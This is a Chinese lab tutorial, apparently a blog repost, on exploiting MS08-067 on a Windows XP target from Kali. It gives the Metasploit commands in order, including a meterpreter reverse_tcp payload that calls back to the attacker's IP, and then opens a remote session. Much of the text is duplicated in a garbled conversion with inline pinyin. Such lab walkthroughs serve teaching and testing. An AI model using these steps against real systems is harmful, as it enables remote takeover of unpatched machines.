kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具對(duì)ms08-067漏洞入侵靶機(jī)(win xp2)
漏洞簡(jiǎn)介
MS08-067漏洞將會(huì)影響Windows 2000/XP/Server 2003/Vista/Server 2008的各個(gè)版本,甚至還包括測(cè)試階段的Windows 7 Pro-Beta。
如果用戶在受影響的系統(tǒng)上收到特制的 RPC 請(qǐng)求,則該漏洞可能允許遠(yuǎn)程執(zhí)行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統(tǒng)上,攻擊者可能未經(jīng)身份驗(yàn)證即可利用此漏洞運(yùn)行任意代碼。 此漏洞可能用于進(jìn)行蠕蟲攻擊。 防火墻最佳做法和標(biāo)準(zhǔn)的默認(rèn)防火墻配置有助于保護(hù)網(wǎng)絡(luò)資源免受從企業(yè)外部發(fā)起的攻擊。
實(shí)驗(yàn)環(huán)境:
工具:metasploit
靶機(jī)兩臺(tái):windows?xp2和kali2020
攻擊機(jī)的IP(kali):192.168.29.133
靶機(jī)IP(xp2): ?192.168.29.134
實(shí)驗(yàn)條件:兩臺(tái)機(jī)子可以互通的,并且windows?xp2(需打開445端口,默認(rèn)為打開)開啟了445端口,防火墻是關(guān)閉的。
步驟:
(1)在kali終端輸入msfconsole,啟動(dòng)Metasploit工具
(2)輸入命令search ??ms08_067,查找關(guān)于ms08_067的漏洞模塊。
(3)輸入如下命令,使用該漏洞模塊
(4)進(jìn)入這個(gè)模塊后,用show options?查看該模塊需要配置的參數(shù)
(5)設(shè)置配置項(xiàng)(show options)
設(shè)置靶機(jī)IP(xp2)set RHOST 192.168.29.134
設(shè)置要執(zhí)行的payload:?set payload windows/meterpreter/reverse_tcp
設(shè)置攻擊機(jī)的IP(kali):set LHOST 192.168.29.133
設(shè)置要攻擊的目標(biāo)操作系統(tǒng)類型:set target 34
用show options查看相關(guān)參數(shù)是否配置正確
6)最后,輸入exploit,回車運(yùn)行,進(jìn)入到特殊的payload---meterpreter,該payload在控制靶機(jī)之后,能夠?qū)Π袡C(jī)執(zhí)行更多的滲透攻擊。用 pwd查看靶機(jī)當(dāng)前的工作路徑,用ipconfig命令查看靶機(jī)的IP地址配置。
總結(jié)
以上是生活随笔為你收集整理的kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kail利用msf工具对ms17-010
- 下一篇: CSDN转载别人文章的操作